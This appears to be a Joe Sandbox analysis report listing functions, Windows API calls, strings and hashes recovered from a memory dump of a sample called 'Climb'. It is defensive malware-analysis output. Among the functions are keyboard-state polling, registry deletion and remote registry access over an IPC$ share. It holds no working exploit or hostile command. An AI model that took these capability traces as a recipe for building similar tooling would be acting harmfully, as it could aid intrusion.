String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: a7cc4a23399479a5f7cd0fb70efe8d8a11ff5694c3ecc91a2e69a3fc3e3c9c7a
Instruction ID: e3721bd068a323760b88943c6841efab838d5365989dce0646c6be904ccb6ba1
Opcode Fuzzy Hash: a7cc4a23399479a5f7cd0fb70efe8d8a11ff5694c3ecc91a2e69a3fc3e3c9c7a
Instruction Fuzzy Hash: AF412272A403147BEB04ABA49C47EFF37ACDF55710F00402AF904A6293EB74EA4192B5

Function 0013D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0013D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0013D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0013D7A8

Part of subcall function 0013D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0013D70A
Part of subcall function 0013D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0013D71D
Part of subcall function 0013D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0013D72F
Part of subcall function 0013D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0013D765
Part of subcall function 0013D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0013D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 0013D753

Strings

RegDeleteKeyExW, xrefs: 0013D729
advapi32.dll, xrefs: 0013D718

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 91a5b71ac9f2e3e9c994435f0f607df47db051db1601072f8e879dff23469fa5
Instruction ID: 4b0faac8f634387d1e2b211c141ddfc1120eee9dadef6697d0640c0ed8be2229
Opcode Fuzzy Hash: 91a5b71ac9f2e3e9c994435f0f607df47db051db1601072f8e879dff23469fa5
Instruction Fuzzy Hash: 01316E75A01129BBDB219BA0FC88EFFBB7CEF56714F000165B805E3250DB349E859AA0

Function 0011EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0011EFCB

Part of subcall function 000CF215: timeGetTime.WINMM(?,?,0011EFEB), ref: 000CF219

Sleep.KERNEL32(0000000A), ref: 0011EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0011F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0011F03E
SetActiveWindow.USER32 ref: 0011F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0011F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0011F08A
Sleep.KERNEL32(000000FA), ref: 0011F095
IsWindow.USER32 ref: 0011F0A1
EndDialog.USER32(00000000), ref: 0011F0B2

Strings

BUTTON, xrefs: 0011F030

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: cb97519eefc48658228bc9f5be2a45c749469eb7c91341c544c6595f130cabee
Instruction ID: cb6a17c74349f9eedc0381ed30811d13091026c31d7f7c7bc8a88925c800be7a
Opcode Fuzzy Hash: cb97519eefc48658228bc9f5be2a45c749469eb7c91341c544c6595f130cabee
Instruction Fuzzy Hash: 4A21CF79200205BFEB156F24FC89A667BABF74AB45B140038F80582A72DB718FC18B11

Function 0011F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0011F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0011F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0011F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0011F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0011F3BE

Strings

open , xrefs: 0011F323
play PlayMe wait, xrefs: 0011F3A8
status PlayMe mode, xrefs: 0011F36F
alias PlayMe, xrefs: 0011F34D
close PlayMe, xrefs: 0011F385, 0011F3B2
play PlayMe, xrefs: 0011F3B9

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: e47a5cf960a5ac2650ac8d39b408dddf618ad904247fb3d660163f50f642ab55
Instruction ID: e488239c134c21f0c9e15ebcd6396e589c34138446ee16f497aa59daeea6581b
Opcode Fuzzy Hash: e47a5cf960a5ac2650ac8d39b408dddf618ad904247fb3d660163f50f642ab55
Instruction Fuzzy Hash: 24110231A9021D7AD724A362CC0AEFFBA7CEBC2B10F00083A7915E20D1EFA01D85C5B0

Function 0011A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0011A9D9
SetKeyboardState.USER32(?), ref: 0011AA44
GetAsyncKeyState.USER32(000000A0), ref: 0011AA64
GetKeyState.USER32(000000A0), ref: 0011AA7B
GetAsyncKeyState.USER32(000000A1), ref: 0011AAAA
GetKeyState.USER32(000000A1), ref: 0011AABB
GetAsyncKeyState.USER32(00000011), ref: 0011AAE7
GetKeyState.USER32(00000011), ref: 0011AAF5
GetAsyncKeyState.USER32(00000012), ref: 0011AB1E
GetKeyState.USER32(00000012), ref: 0011AB2C
GetAsyncKeyState.USER32(0000005B), ref: 0011AB55
GetKeyState.USER32(0000005B), ref: 0011AB63

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 92dfe3a1382f3da1b83eac7735e161de8e14b88fcfbe159484687fd2ffe1b271
Instruction ID: 0fcbc562d67c2b22cbb7bdeb254ddb5ef18dac67d45018c676211805a50b89bb
Opcode Fuzzy Hash: 92dfe3a1382f3da1b83eac7735e161de8e14b88fcfbe159484687fd2ffe1b271
Instruction Fuzzy Hash: 99510860A097C829FB39D7709850BEABFB58F12344F8845A9D5C20B1C2DB649BCCC763

Function 0011662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00116649
GetWindowRect.USER32(00000000,?), ref: 00116662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001166C0
GetDlgItem.USER32(?,00000002), ref: 001166D0
GetWindowRect.USER32(00000000,?), ref: 001166E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00116736
GetDlgItem.USER32(?,000003E9), ref: 00116744
GetWindowRect.USER32(00000000,?), ref: 00116756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00116798
GetDlgItem.USER32(?,000003EA), ref: 001167AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001167C1
InvalidateRect.USER32(?,00000000,00000001), ref: 001167CE

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 719eab8262debaf8e0c2977e14541bac4fa0355fd6bbaf3a56c426336fa85e3b
Instruction ID: a7c8bac2140e6834c652880b42b24e11956e791528cee35f10848f0432753791
Opcode Fuzzy Hash: 719eab8262debaf8e0c2977e14541bac4fa0355fd6bbaf3a56c426336fa85e3b
Instruction Fuzzy Hash: DC513DB5B00205AFDF18CF68DD89AAEBBB5FB48315F108129F919E66A0D7719D40CB50

Function 000B146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000B1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B1488,?,00000000,?,?,?,?,000B145A,00000000,?), ref: 000B1865

DestroyWindow.USER32(?), ref: 000B1521
KillTimer.USER32(00000000,?,?,?,?,000B145A,00000000,?), ref: 000B15BB
DestroyAcceleratorTable.USER32(00000000), ref: 000F29B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,000B145A,00000000,?), ref: 000F29E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,000B145A,00000000,?), ref: 000F29F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000B145A,00000000), ref: 000F2A15
DeleteObject.GDI32(00000000), ref: 000F2A27

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 01429105f8999dad49a4fc8db3315715a288fa25c330477d3575ab9e600d0b7f
Instruction ID: 370428a7cc9c2d82492ed266f5dc965b7c4725016c4244dd1b0b737bd7f5c157
Opcode Fuzzy Hash: 01429105f8999dad49a4fc8db3315715a288fa25c330477d3575ab9e600d0b7f
Instruction Fuzzy Hash: 4B618931901B25DFDB369F14D959BBA77F1FB80326F904018E0429BA70C774A991DB81

Function 000B2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 000B2234: GetWindowLongW.USER32(?,000000EB), ref: 000B2242

GetSysColor.USER32(0000000F), ref: 000B2152

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: c2a1d36bb7f53f02c175715599e854fd57dc2eb8b6e3f06803ee55886e89b8c8
Instruction ID: 2129278eca5c365930ebae304e087d7a9606c507a2b9581298a5e3d8e7d308c0
Opcode Fuzzy Hash: c2a1d36bb7f53f02c175715599e854fd57dc2eb8b6e3f06803ee55886e89b8c8
Instruction Fuzzy Hash: B541AD35200644AFDF209F389C48BF93BB5AB56730F154A55FAA28B6E1C7318D82EB10

Function 0011A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00100D31,00000001,0000138C,00000001,00000000,00000001,?,0012EEAE,00182430), ref: 0011A091
LoadStringW.USER32(00000000,?,00100D31,00000001), ref: 0011A09A

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00100D31,00000001,0000138C,00000001,00000000,00000001,?,0012EEAE,00182430,?), ref: 0011A0BC
LoadStringW.USER32(00000000,?,00100D31,00000001), ref: 0011A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011A1E0

Strings

^ ERROR, xrefs: 0011A175
%s (%d) : ==> %s: %s %s, xrefs: 0011A1C4
Line %d:, xrefs: 0011A11A
Error: , xrefs: 0011A197
Line %d (File "%s"):, xrefs: 0011A109

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 29b7ef471d5661006d1fe8d2de269e50a1014bc4f6eac99b78146775af790c69
Instruction ID: e5482ec6be9cbf1f09c6f4ecc56930764dfa4c09f4c9641cbadc2c8aa888344e
Opcode Fuzzy Hash: 29b7ef471d5661006d1fe8d2de269e50a1014bc4f6eac99b78146775af790c69
Instruction Fuzzy Hash: 9F411E7290020DABCF15EBE0DD56EEEB779AF58700F500065B505B20A3EB756F89CB61

Function 00110FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00111093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001110AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001110CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001110F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0011111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00111128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0011112D

Strings

\CLSID, xrefs: 00111015
\IPC$, xrefs: 00111075
SOFTWARE\Classes\, xrefs: 00110FFF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 710b53c0837c67b680ce848824250653cd991c14af4a6c842c4a0c82a094e32c
Instruction ID: 6b27fa69712d48eb2b6a2158c9577e974df9deec432479f4387aa8941e0ba8ff
Opcode Fuzzy Hash: 710b53c0837c67b680ce848824250653cd991c14af4a6c842c4a0c82a094e32c
Instruction Fuzzy Hash: A3410876D10229AFCF25EBA4EC85DEEB778BF08740F004129FA01A3162EB719E44CB50

Function 00144A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00144AD9
CreateCompatibleDC.GDI32(00000000), ref: 00144AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00144AF3
SelectObject.GDI32(00000000,00000000), ref: 00144AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00144B06
DeleteDC.GDI32(00000000), ref: 00144B10
GetWindowLongW.USER32(?,000000EC), ref: 00144B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00144B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00144B3C

Strings

static, xrefs: 00144A71

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 3f7db7892d97f6b712c6d311f7688ab3ecc43435a7ae217daa49f1e79d283f61
Instruction ID: c329e8719e2ae8448ff36b1a68d946656c1542f11f1d835f959d2d18a8c45704
Opcode Fuzzy Hash: 3f7db7892d97f6b712c6d311f7688ab3ecc43435a7ae217daa49f1e79d283f61
Instruction Fuzzy Hash: 92318D76100215BBDF129FA4EC08FDA3BA9FF0E724F110220FA15A61B0C735D8A0DB94

Function 0013468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001346B9
CoInitialize.OLE32(00000000), ref: 001346E7
CoUninitialize.OLE32 ref: 001346F1
_wcslen.LIBCMT ref: 0013478A
GetRunningObjectTable.OLE32(00000000,?), ref: 0013480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00134932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0013496B
CoGetObject.OLE32(?,00000000,00150B64,?), ref: 0013498A
SetErrorMode.KERNEL32(00000000), ref: 0013499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00134A21
VariantClear.OLEAUT32(?), ref: 00134A35

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: bae5bcc085bfa2169f9f293ba4a87871dd0c95fb2153a7c9fbb0c7c435c4d017
Instruction ID: 7ab379e8ac28ae62aa9dd52731f0ae8ad137a28b091951634e046838f80fd6e3
Opcode Fuzzy Hash: bae5bcc085bfa2169f9f293ba4a87871dd0c95fb2153a7c9fbb0c7c435c4d017
Instruction Fuzzy Hash: 5BC154B1608301AFD700DF68C88496BBBE9FF89748F00495DF98A9B261DB31ED45CB52

Function 001284DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00128538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001285D4
SHGetDesktopFolder.SHELL32(?), ref: 001285E8
CoCreateInstance.OLE32(00150CD4,00000000,00000001,00177E8C,?), ref: 00128634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001286B9
CoTaskMemFree.OLE32(?,?), ref: 00128711
SHBrowseForFolderW.SHELL32(?), ref: 0012879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001287BF
CoTaskMemFree.OLE32(00000000), ref: 001287C6
CoTaskMemFree.OLE32(00000000), ref: 0012881B
CoUninitialize.OLE32 ref: 00128821

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 3eb174b03e9ffe73b490a732dd70fb946cbb3196c61c0c51573897fe371b32a9
Instruction ID: 7426ec6eecf1d8a521c17592c6ec506c60cfd6393071fe4351cbd0b8f9c83888
Opcode Fuzzy Hash: 3eb174b03e9ffe73b490a732dd70fb946cbb3196c61c0c51573897fe371b32a9
Instruction Fuzzy Hash: C8C12A75A00215EFDB14DFA4D888DAEBBF9FF48304B148498E419DB662DB31ED45CB90

Function 00110378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0011039F
SafeArrayAllocData.OLEAUT32(?), ref: 001103F8
VariantInit.OLEAUT32(?), ref: 0011040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0011042A
VariantCopy.OLEAUT32(?,?), ref: 0011047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00110491
VariantClear.OLEAUT32(?), ref: 001104A6
SafeArrayDestroyData.OLEAUT32(?), ref: 001104B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001104BC
VariantClear.OLEAUT32(?), ref: 001104CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001104D9

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 019a5ebb0ce3fd0a92d52ac583e11b304e5154901fc177550b5ced224125c50c
Instruction ID: 57b8994560081d846c99b07d867bfb9f81323e24fbbb21f6254d266e3fdf5e77
Opcode Fuzzy Hash: 019a5ebb0ce3fd0a92d52ac583e11b304e5154901fc177550b5ced224125c50c
Instruction Fuzzy Hash: 45417F35E00219EFCF15DFA4D8849EE7BB9FF18354F048029E915A7A61CB74A985CBA0

Function 0011A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0011A65D
GetAsyncKeyState.USER32(000000A0), ref: 0011A6DE
GetKeyState.USER32(000000A0), ref: 0011A6F9
GetAsyncKeyState.USER32(000000A1), ref: 0011A713
GetKeyState.USER32(000000A1), ref: 0011A728
GetAsyncKeyState.USER32(00000011), ref: 0011A740
GetKeyState.USER32(00000011), ref: 0011A752
GetAsyncKeyState.USER32(00000012), ref: 0011A76A
GetKeyState.USER32(00000012), ref: 0011A77C
GetAsyncKeyState.USER32(0000005B), ref: 0011A794
GetKeyState.USER32(0000005B), ref: 0011A7A6

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
